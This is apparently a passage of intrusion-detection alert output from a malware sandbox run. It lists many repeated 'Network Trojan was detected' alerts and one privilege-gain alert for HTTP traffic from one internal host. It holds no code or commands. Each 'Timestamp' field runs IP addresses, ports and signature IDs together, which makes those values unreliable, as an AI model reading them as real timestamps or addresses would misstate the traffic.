                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349912802027700 01/05/23-08:59:13.692839
                                SID:2027700
                                Source Port:49912
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950637802027700 01/05/23-09:00:48.436611
                                SID:2027700
                                Source Port:50637
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350623802027700 01/05/23-09:00:47.009580
                                SID:2027700
                                Source Port:50623
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950150802027700 01/05/23-08:59:54.650792
                                SID:2027700
                                Source Port:50150
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349915802027700 01/05/23-08:59:13.981646
                                SID:2027700
                                Source Port:49915
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949779802027700 01/05/23-08:58:48.344707
                                SID:2027700
                                Source Port:49779
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350200802027700 01/05/23-09:00:00.941331
                                SID:2027700
                                Source Port:50200
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350213802027700 01/05/23-09:00:02.433402
                                SID:2027700
                                Source Port:50213
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949957802027700 01/05/23-08:59:24.466583
                                SID:2027700
                                Source Port:49957
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350089802027700 01/05/23-08:59:48.824913
                                SID:2027700
                                Source Port:50089
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350292802027700 01/05/23-09:00:10.003177
                                SID:2027700
                                Source Port:50292
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950713802027700 01/05/23-09:00:57.660018
                                SID:2027700
                                Source Port:50713
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350534802027700 01/05/23-09:00:39.227541
                                SID:2027700
                                Source Port:50534
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950795802027700 01/05/23-09:01:04.954635
                                SID:2027700
                                Source Port:50795
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949827802027700 01/05/23-08:58:57.221076
                                SID:2027700
                                Source Port:49827
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350060802027700 01/05/23-08:59:45.051206
                                SID:2027700
                                Source Port:50060
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350432802027700 01/05/23-09:00:27.031813
                                SID:2027700
                                Source Port:50432
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950665802027700 01/05/23-09:00:53.200536
                                SID:2027700
                                Source Port:50665
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950341802027700 01/05/23-09:00:17.487935
                                SID:2027700
                                Source Port:50341
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350445802027700 01/05/23-09:00:28.569322
                                SID:2027700
                                Source Port:50445
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950576802027700 01/05/23-09:00:42.786422
                                SID:2027700
                                Source Port:50576
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350254802027700 01/05/23-09:00:06.338634
                                SID:2027700
                                Source Port:50254
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949852802027700 01/05/23-08:59:05.209359
                                SID:2027700
                                Source Port:49852
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950316802027700 01/05/23-09:00:12.218672
                                SID:2027700
                                Source Port:50316
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349997802027700 01/05/23-08:59:31.295981
                                SID:2027700
                                Source Port:49997
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350035802027700 01/05/23-08:59:41.517278
                                SID:2027700
                                Source Port:50035
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950179802027700 01/05/23-08:59:58.858144
                                SID:2027700
                                Source Port:50179
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350116802027700 01/05/23-08:59:51.628169
                                SID:2027700
                                Source Port:50116
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350468802027700 01/05/23-09:00:32.018517
                                SID:2027700
                                Source Port:50468
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350407802027700 01/05/23-09:00:24.548807
                                SID:2027700
                                Source Port:50407
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349947802027700 01/05/23-08:59:22.445608
                                SID:2027700
                                Source Port:49947
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350180802027700 01/05/23-08:59:58.895130
                                SID:2027700
                                Source Port:50180
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350505802027700 01/05/23-09:00:36.994006
                                SID:2027700
                                Source Port:50505
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350759802027700 01/05/23-09:01:01.972492
                                SID:2027700
                                Source Port:50759
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950424802027700 01/05/23-09:00:26.250769
                                SID:2027700
                                Source Port:50424
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350460802027700 01/05/23-09:00:30.456826
                                SID:2027700
                                Source Port:50460
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949833802027700 01/05/23-08:58:59.004495
                                SID:2027700
                                Source Port:49833
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350723802027700 01/05/23-09:00:58.765351
                                SID:2027700
                                Source Port:50723
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350340802027700 01/05/23-09:00:17.275801
                                SID:2027700
                                Source Port:50340
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349877802027700 01/05/23-08:59:09.325226
                                SID:2027700
                                Source Port:49877
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950813802027700 01/05/23-09:01:06.470615
                                SID:2027700
                                Source Port:50813
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350541802027700 01/05/23-09:00:39.980064
                                SID:2027700
                                Source Port:50541
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950071802027700 01/05/23-08:59:46.777628
                                SID:2027700
                                Source Port:50071
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950555802027700 01/05/23-09:00:41.254162
                                SID:2027700
                                Source Port:50555
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350636802027700 01/05/23-09:00:48.393290
                                SID:2027700
                                Source Port:50636
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350317802027700 01/05/23-09:00:12.726244
                                SID:2027700
                                Source Port:50317
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950354802027700 01/05/23-09:00:19.168728
                                SID:2027700
                                Source Port:50354
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350074802027700 01/05/23-08:59:47.026568
                                SID:2027700
                                Source Port:50074
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350222802027700 01/05/23-09:00:03.270757
                                SID:2027700
                                Source Port:50222
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350199802027700 01/05/23-09:00:00.872060
                                SID:2027700
                                Source Port:50199
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350726802027700 01/05/23-09:00:59.004260
                                SID:2027700
                                Source Port:50726
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949908802027700 01/05/23-08:59:13.194726
                                SID:2027700
                                Source Port:49908
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350792802027700 01/05/23-09:01:04.617976
                                SID:2027700
                                Source Port:50792
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350525802027700 01/05/23-09:00:38.502864
                                SID:2027700
                                Source Port:50525
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950542802027700 01/05/23-09:00:40.061715
                                SID:2027700
                                Source Port:50542
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350353802027700 01/05/23-09:00:18.907939
                                SID:2027700
                                Source Port:50353
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950269802027700 01/05/23-09:00:07.819982
                                SID:2027700
                                Source Port:50269
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950539802027700 01/05/23-09:00:39.777060
                                SID:2027700
                                Source Port:50539
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349927802027700 01/05/23-08:59:15.970448
                                SID:2027700
                                Source Port:49927
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350185802027700 01/05/23-08:59:59.350277
                                SID:2027700
                                Source Port:50185
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350314802027700 01/05/23-09:00:12.065224
                                SID:2027700
                                Source Port:50314
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350463802027700 01/05/23-09:00:30.651670
                                SID:2027700
                                Source Port:50463
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350206802027700 01/05/23-09:00:01.655457
                                SID:2027700
                                Source Port:50206
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950010802027700 01/05/23-08:59:33.190763
                                SID:2027700
                                Source Port:50010
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350208802027700 01/05/23-09:00:01.921195
                                SID:2027700
                                Source Port:50208
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949899802027700 01/05/23-08:59:12.230175
                                SID:2027700
                                Source Port:49899
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350291802027700 01/05/23-09:00:09.845536
                                SID:2027700
                                Source Port:50291
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950612802027700 01/05/23-09:00:46.010211
                                SID:2027700
                                Source Port:50612
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950048802027700 01/05/23-08:59:43.254725
                                SID:2027700
                                Source Port:50048
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950469802027700 01/05/23-09:00:32.139792
                                SID:2027700
                                Source Port:50469
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949928802027700 01/05/23-08:59:16.156869
                                SID:2027700
                                Source Port:49928
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350172802027700 01/05/23-08:59:58.243125
                                SID:2027700
                                Source Port:50172
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350203802027700 01/05/23-09:00:01.370969
                                SID:2027700
                                Source Port:50203
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350136802027700 01/05/23-08:59:53.628306
                                SID:2027700
                                Source Port:50136
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350611802027700 01/05/23-09:00:45.884010
                                SID:2027700
                                Source Port:50611
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350748802027700 01/05/23-09:01:00.949287
                                SID:2027700
                                Source Port:50748
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949751802027700 01/05/23-08:58:36.904386
                                SID:2027700
                                Source Port:49751
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949964802027700 01/05/23-08:59:25.616885
                                SID:2027700
                                Source Port:49964
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950121802027700 01/05/23-08:59:52.118265
                                SID:2027700
                                Source Port:50121
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950216802027700 01/05/23-09:00:02.609214
                                SID:2027700
                                Source Port:50216
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950210802027700 01/05/23-09:00:02.006539
                                SID:2027700
                                Source Port:50210
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350189802027700 01/05/23-08:59:59.824335
                                SID:2027700
                                Source Port:50189
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950075802027700 01/05/23-08:59:47.120103
                                SID:2027700
                                Source Port:50075
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350641802027700 01/05/23-09:00:48.985991
                                SID:2027700
                                Source Port:50641
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950727802027700 01/05/23-09:00:59.170702
                                SID:2027700
                                Source Port:50727
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350252802027700 01/05/23-09:00:06.188358
                                SID:2027700
                                Source Port:50252
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350419802027700 01/05/23-09:00:25.681850
                                SID:2027700
                                Source Port:50419
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950730802027700 01/05/23-09:00:59.492867
                                SID:2027700
                                Source Port:50730
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949977802027700 01/05/23-08:59:28.282302
                                SID:2027700
                                Source Port:49977
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949879802027700 01/05/23-08:59:09.532804
                                SID:2027700
                                Source Port:49879
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350357802027700 01/05/23-09:00:19.508975
                                SID:2027700
                                Source Port:50357
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350386802027700 01/05/23-09:00:22.817111
                                SID:2027700
                                Source Port:50386
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950028802027700 01/05/23-08:59:37.775687
                                SID:2027700
                                Source Port:50028
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350268802027700 01/05/23-09:00:07.593507
                                SID:2027700
                                Source Port:50268
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950117802027700 01/05/23-08:59:51.855653
                                SID:2027700
                                Source Port:50117
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949783802027700 01/05/23-08:58:50.923909
                                SID:2027700
                                Source Port:49783
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350271802027700 01/05/23-09:00:08.033607
                                SID:2027700
                                Source Port:50271
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350104802027700 01/05/23-08:59:50.380782
                                SID:2027700
                                Source Port:50104
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950207802027700 01/05/23-09:00:01.651345
                                SID:2027700
                                Source Port:50207
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950361802027700 01/05/23-09:00:19.892020
                                SID:2027700
                                Source Port:50361
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950769802027700 01/05/23-09:01:02.858096
                                SID:2027700
                                Source Port:50769
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350430802027700 01/05/23-09:00:26.794589
                                SID:2027700
                                Source Port:50430
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350488802027700 01/05/23-09:00:34.902685
                                SID:2027700
                                Source Port:50488
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350643802027700 01/05/23-09:00:49.009624
                                SID:2027700
                                Source Port:50643
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349970802027700 01/05/23-08:59:27.314920
                                SID:2027700
                                Source Port:49970
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350440802027700 01/05/23-09:00:27.918582
                                SID:2027700
                                Source Port:50440
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349884802027700 01/05/23-08:59:10.124546
                                SID:2027700
                                Source Port:49884
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950003802027700 01/05/23-08:59:32.173672
                                SID:2027700
                                Source Port:50003
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949813802027700 01/05/23-08:58:54.450868
                                SID:2027700
                                Source Port:49813
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349881802027700 01/05/23-08:59:09.842337
                                SID:2027700
                                Source Port:49881
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950187802027700 01/05/23-08:59:59.667871
                                SID:2027700
                                Source Port:50187
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350215802027700 01/05/23-09:00:02.576419
                                SID:2027700
                                Source Port:50215
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350228802027700 01/05/23-09:00:03.862562
                                SID:2027700
                                Source Port:50228
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.159.1850372802851115 01/05/23-09:00:21.680294
                                SID:2851115
                                Source Port:50372
                                Destination Port:80
                                Protocol:TCP
                                Classtype:Attempted Administrator Privilege Gain
                                Timestamp:192.168.2.445.66.230.12350304802027700 01/05/23-09:00:11.110179
                                SID:2027700
                                Source Port:50304
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350360802027700 01/05/23-09:00:19.727404
                                SID:2027700
                                Source Port:50360
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950457802027700 01/05/23-09:00:29.876026
                                SID:2027700
                                Source Port:50457
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350812802027700 01/05/23-09:01:06.282762
                                SID:2027700
                                Source Port:50812
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949882802027700 01/05/23-08:59:09.841386
                                SID:2027700
                                Source Port:49882
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349951802027700 01/05/23-08:59:23.162904
                                SID:2027700
                                Source Port:49951
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949971802027700 01/05/23-08:59:27.318420
                                SID:2027700
                                Source Port:49971
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950743802027700 01/05/23-09:01:00.393291
                                SID:2027700
                                Source Port:50743
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350640802027700 01/05/23-09:00:48.797450
                                SID:2027700
                                Source Port:50640
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950091802027700 01/05/23-08:59:49.084824
                                SID:2027700
                                Source Port:50091
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950305802027700 01/05/23-09:00:11.148232
                                SID:2027700
                                Source Port:50305
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950654802027700 01/05/23-09:00:52.679355
                                SID:2027700
                                Source Port:50654
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350456802027700 01/05/23-09:00:29.834841
                                SID:2027700
                                Source Port:50456
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350297802027700 01/05/23-09:00:10.453390
                                SID:2027700
                                Source Port:50297
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950530802027700 01/05/23-09:00:38.850237
                                SID:2027700
                                Source Port:50530
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350202802027700 01/05/23-09:00:01.210425
                                SID:2027700
                                Source Port:50202
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349941802027700 01/05/23-08:59:18.710600
                                SID:2027700
                                Source Port:49941
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350601802027700 01/05/23-09:00:44.976313
                                SID:2027700
                                Source Port:50601
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950476802027700 01/05/23-09:00:34.527456
                                SID:2027700
                                Source Port:50476
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.437.34.248.2449920802851815 01/05/23-08:59:14.814538
                                SID:2851815
                                Source Port:49920
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350775802027700 01/05/23-09:01:03.271791
                                SID:2027700
                                Source Port:50775
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350673802027700 01/05/23-09:00:53.758617
                                SID:2027700
                                Source Port:50673
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950724802027700 01/05/23-09:00:58.831438
                                SID:2027700
                                Source Port:50724
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950335802027700 01/05/23-09:00:16.671901
                                SID:2027700
                                Source Port:50335
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949922802027700 01/05/23-08:59:15.038977
                                SID:2027700
                                Source Port:49922
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350627802027700 01/05/23-09:00:47.545192
                                SID:2027700
                                Source Port:50627
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950157802027700 01/05/23-08:59:56.243038
                                SID:2027700
                                Source Port:50157
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350710802027700 01/05/23-09:00:57.471023
                                SID:2027700
                                Source Port:50710
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350768802027700 01/05/23-09:01:02.747840
                                SID:2027700
                                Source Port:50768
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350532802027700 01/05/23-09:00:39.066304
                                SID:2027700
                                Source Port:50532
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949829802027700 01/05/23-08:58:57.887757
                                SID:2027700
                                Source Port:49829
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350805802027700 01/05/23-09:01:05.712078
                                SID:2027700
                                Source Port:50805
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350294802027700 01/05/23-09:00:10.061489
                                SID:2027700
                                Source Port:50294
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950780802027700 01/05/23-09:01:03.773012
                                SID:2027700
                                Source Port:50780
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950391802027700 01/05/23-09:00:23.130860
                                SID:2027700
                                Source Port:50391
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350785802027700 01/05/23-09:01:04.195018
                                SID:2027700
                                Source Port:50785
